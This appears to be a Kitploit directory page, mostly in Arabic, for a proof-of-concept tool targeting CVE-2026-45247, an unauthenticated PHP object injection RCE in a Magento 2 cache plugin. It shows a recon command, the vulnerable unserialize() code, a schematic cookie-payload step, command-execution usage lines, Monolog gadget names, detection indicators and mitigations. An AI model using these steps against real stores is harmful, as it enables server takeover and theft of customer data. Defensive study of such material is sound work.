Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PoC-Funcional---CVE-2026-45247-Mirasvit-Full-Page-Cache-Warmer-RCE- — إثبات مفهوم وظيفي لـ CVE-2026-45247: حقن كائنات PHP إلى تنفيذ تعليمات برمجية عن بُعد (RCE) غير مصادق عليه في Mirasvit Full Page Cache (Magento 2). | Kitploit
أدوات/GitHubGitHub/fevar54/poc-funcional---cve-2026-45247-mirasvit-full-page-cache-warmer-rce-
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubfevar54/poc-funcional---cve-2026-45247-mirasvit-full-page-cache-warmer-rce-

PoC-Funcional---CVE-2026-45247-Mirasvit-Full-Page-Cache-Warmer-RCE-

إثبات مفهوم وظيفي لـ CVE-2026-45247: حقن كائنات PHP إلى تنفيذ تعليمات برمجية عن بُعد (RCE) غير مصادق عليه في Mirasvit Full Page Cache (Magento 2).

عرض المستودع
1منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-45247 - Mirasvit Full Page Cache Warmer for Magento 2 - حقن كائنات PHP → تنفيذ الأوامر عن بعد

CVE-2026-45247 CVSS CISA KEV

📋 الوصف

CVE-2026-45247 هي ثغرة حرجة من نوع حقن كائنات PHP (PHP Object Injection) في إضافة Mirasvit Full Page Cache Warmer لـ Magento 2 و Adobe Commerce. يمكن لمهاجم غير مصادق تحقيق تنفيذ الأوامر عن بعد (RCE) عن طريق إرسال كائن PHP مُسلسَل معدل في ملف تعريف الارتباط CacheWarmer.

تكمُن الثغرة في الاستدعاء غير المقيد لدالة PHP الأصلية unserialize()، والمقترنة بسلاسل الأدوات (gadget chains) المتوفرة في Magento وتبعياته (خاصة Monolog).

السمةالقيمة
CVECVE-2026-45247
المنتجMirasvit Full Page Cache Warmer for Magento 2
الإصدارات المتأثرةجميع الإصدارات السابقة للإصدار 1.11.12
التصحيح المتاحالإصدار 1.11.12 (25 مايو 2026)
درجة CVSS9.8 (حرجة)
المتجهAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
الحالة في CISA KEVاستغلال نشط مؤكد (أُضيف في 03/06/2026)
الموعد النهائي06/06/2026

🚨 آلية الهجوم

  1. تقوم الإضافة بمعالجة ملف تعريف الارتباط CacheWarmer في كل طلب متجر
  2. تُمرر قيمة ملف تعريف الارتباط إلى unserialize() دون تنقية
  3. يرسل المهاجم كائن PHP مُسلسَل خبيث
  4. باستخدام سلاسل أدوات Monolog (SyslogUdpHandler, BufferHandler, FingersCrossedHandler)، يتم تحقيق RCE
  5. يتم تنفيذ الأمر على الخادم بصلاحيات خدمة الويب

⚙️ مراحل الهجوم

المرحلة 1: الاستطلاع

root@kitploit:~
# Verificar si la tienda usa Mirasvit Cache Warmer
curl -s https://tienda.com/pub/media/mirasvit/cache_warmer/CHANGELOG.md

المرحلة 2: تحليل الثغرة

root@kitploit:~
# La cookie se procesa en cada request sin autenticación
# El código vulnerable en Mirasvit:
$cookieValue = $_COOKIE['CacheWarmer'];
$data = unserialize(base64_decode($cookieValue));  # ¡Peligro!

المرحلة 3: تنفيذ الاستغلال

root@kitploit:~
# Construcción de la cookie maliciosa
payload = serialize(PHPObjectInjection())
cookie_value = f"CacheWarmer:{base64_encode(payload)}"

# Envío de la petición
requests.get(target, cookies={'CacheWarmer': cookie_value})

🛠️ استخدام إثبات المفهوم (PoC)

التثبيت

root@kitploit:~
git clone https://github.com/tu-usuario/CVE-2026-45247.git
cd CVE-2026-45247
pip install requests

التنفيذ الأساسي

root@kitploit:~
# Verificar vulnerabilidad
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com --check-only

# Ejecutar comando 'id'
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "id"

# Ejecutar comando personalizado
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "whoami"

# Usar proxy para depuración
python3 cve_2026_45247_poc.py https://tienda.ejemplo.com "ls -la" --proxy http://127.0.0.1:8080

نص سريع

root@kitploit:~
# Verificar con script bash
chmod +x check_cve_2026_45247.sh
./check_cve_2026_45247.sh https://tienda.ejemplo.com

📊 الأثر المُثبت

  • تنفيذ الأوامر عن بعد (RCE) على خادم Magento
  • وصول كامل إلى قاعدة بيانات العملاء والطلبات
  • تثبيت ويب شيل للاستمرارية
  • اختراق كامل للمتجر الإلكتروني
  • احتمال تسريب بيانات بطاقات الائتمان
  • حركة جانبية في البنية التحتية للشركة

🛡️ الكشف

مؤشرات الاختراق (IOCs)

في سجلات الوصول:

root@kitploit:~
CacheWarmer: (Tz|Qz|YT)[a-zA-Z0-9+/=]+

الأوامر التي لوحظت في الاستغلال:

root@kitploit:~
echo PWNED_CVE2026_$(date +%s)
sleep 5

سلاسل الأدوات المستخدمة:

  • Monolog\Handler\SyslogUdpHandler
  • Monolog\Handler\BufferHandler
  • Monolog\Handler\FingersCrossedHandler
  • Monolog\Handler\GroupHandler

🔧 التخفيف

التحديث الفوري

root@kitploit:~
# Actualizar a versión parcheada
composer require mirasvit/module-cache-warmer:1.11.12
bin/magento cache:flush

تخفيفات مؤقتة

root@kitploit:~
# Bloquear cookie CacheWarmer en .htaccess o nginx
RewriteCond %{HTTP_COOKIE} CacheWarmer
RewriteRule .* - [F,L]
root@kitploit:~
// En app/code/local/Custom/BlockCookie.php
if (isset($_COOKIE['CacheWarmer'])) {
    unset($_COOKIE['CacheWarmer']);
}
تنزيل الأداة